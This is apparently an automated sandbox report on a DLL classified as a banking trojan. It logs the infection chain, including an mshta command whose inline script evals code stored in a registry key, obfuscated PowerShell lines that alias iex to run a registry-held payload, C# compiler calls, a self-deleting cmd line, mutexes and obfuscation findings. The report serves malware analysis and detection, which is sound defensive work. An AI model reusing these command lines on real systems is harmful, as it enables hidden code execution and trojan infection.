Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

PE / OLE file has an invalid certificate

Source: 61f113091fd0c.dll

Static PE information: invalid certificate

Source: 61f113091fd0c.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\61f113091fd0c.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\61f113091fd0c.dll,DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tm45='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tm45).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sr9b='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sr9b).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Agjk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Agjk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Eote='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Eote).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEEB.tmp" "c:\Users\user\AppData\Local\Temp\CSCA98C8C663682422BB3F042EAAC3AA5FC.TMP"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF563.tmp" "c:\Users\user\AppData\Local\Temp\CSC8BAF1FC523B466D86EA8211DF896A.TMP"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA8.tmp" "c:\Users\user\AppData\Local\Temp\CSC38F7C9333840429F8E926B6BB254946E.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES105D.tmp" "c:\Users\user\AppData\Local\Temp\CSC2A73DB97C702412EB695E62356797BBE.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E65.tmp" "c:\Users\user\AppData\Local\Temp\CSC7E62D986CCD14293A1B1D71B70775B41.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3848.tmp" "c:\Users\user\AppData\Local\Temp\CSCCBF2AAC487274BF4B5441EA2B445AE92.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A3A.tmp" "c:\Users\user\AppData\Local\Temp\CSC176C1CB9788E4426ACAF7B271AB13B4.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C6C.tmp" "c:\Users\user\AppData\Local\Temp\CSC1CA052A85412AB8DCD9B872B5234E.TMP"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61f113091fd0c.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\61f113091fd0c.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\61f113091fd0c.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEEB.tmp" "c:\Users\user\AppData\Local\Temp\CSCA98C8C663682422BB3F042EAAC3AA5FC.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF563.tmp" "c:\Users\user\AppData\Local\Temp\CSC8BAF1FC523B466D86EA8211DF896A.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA8.tmp" "c:\Users\user\AppData\Local\Temp\CSC38F7C9333840429F8E926B6BB254946E.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES105D.tmp" "c:\Users\user\AppData\Local\Temp\CSC2A73DB97C702412EB695E62356797BBE.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E65.tmp" "c:\Users\user\AppData\Local\Temp\CSC7E62D986CCD14293A1B1D71B70775B41.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3848.tmp" "c:\Users\user\AppData\Local\Temp\CSCCBF2AAC487274BF4B5441EA2B445AE92.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A3A.tmp" "c:\Users\user\AppData\Local\Temp\CSC176C1CB9788E4426ACAF7B271AB13B4.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C6C.tmp" "c:\Users\user\AppData\Local\Temp\CSC1CA052A85412AB8DCD9B872B5234E.TMP"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61f113091fd0c.dll
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20220126\PowerShell_transcript.124406.bcfkRUYJ.20220126102824.txt

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npkgel2o.x34.ps1

Source: classification engine

Classification label: mal100.bank.troj.evad.winDLL@76/57@0/2

Source: C:\Windows\System32\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_01C12130 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

1_2_01C12130

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{749A14DC-4303-C6CF-6DE8-275AF19C4B2E}
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{24E56635-33EE-F65D-DD98-178A614C3B5E}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{D43C1FA8-2382-2681-4D48-07BAD1FC2B8E}
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{F4526350-C361-469C-ED68-A7DA711CCBAE}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{D0842125-EF91-8296-F904-93D63D78776A}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{E8190BB2-27B4-5AA3-F19C-4B2EB590AF42}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6216:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{F8CD5B50-F738-EA41-41AC-1BBE05A07FD2}
Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{18963B60-9722-0ADF-E1CC-BBDEA5C01FF2}
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{54F96618-A314-A6F1-CDC8-873A517CAB0E}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1284:120:WilError_01
Source: C:\Windows\System32\loaddll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{9C95EA6E-4BB4-2EFD-B590-AF42B9C45396}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4556:120:WilError_01

Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: 61f113091fd0c.dll

Static file information: File size 1062256 > 1048576

Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000001.00000003.455695462.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.440284992.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.454013508.0000000006360000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.435436816.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.429285803.00000000064C0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.439095932.0000000006110000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.455695462.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.440284992.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.454013508.0000000006360000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.435436816.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.429285803.00000000064C0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.439095932.0000000006110000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_01C17D50 push ecx; ret	1_2_01C17D59
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_01C180BF push ecx; ret	1_2_01C180CF
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC06F5 push dword ptr [ebp-00000284h]; ret	1_2_00DC0764
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0880 push dword ptr [ebp-00000284h]; ret	1_2_00DC08B6
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0AB8 push edx; ret	1_2_00DC0B11
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0A64 push edx; ret	1_2_00DC0B11
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0A64 push dword ptr [esp+10h]; ret	1_2_00DC0BFB
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC05DF push dword ptr [ebp-00000284h]; ret	1_2_00DC087F
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0BFC push dword ptr [esp+0Ch]; ret	1_2_00DC0C10
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0BFC push dword ptr [esp+10h]; ret	1_2_00DC0C56
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046E7347 push ecx; ret	1_2_046E7357
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_031F7D50 push ecx; ret	3_2_031F7D59
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_031F80BF push ecx; ret	3_2_031F80CF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BE6DD0 push ecx; ret	3_2_04BE6DD9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BE7347 push ecx; ret	3_2_04BE7357
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_011205DF push dword ptr [ebp-00000284h]; ret	4_2_0112087F
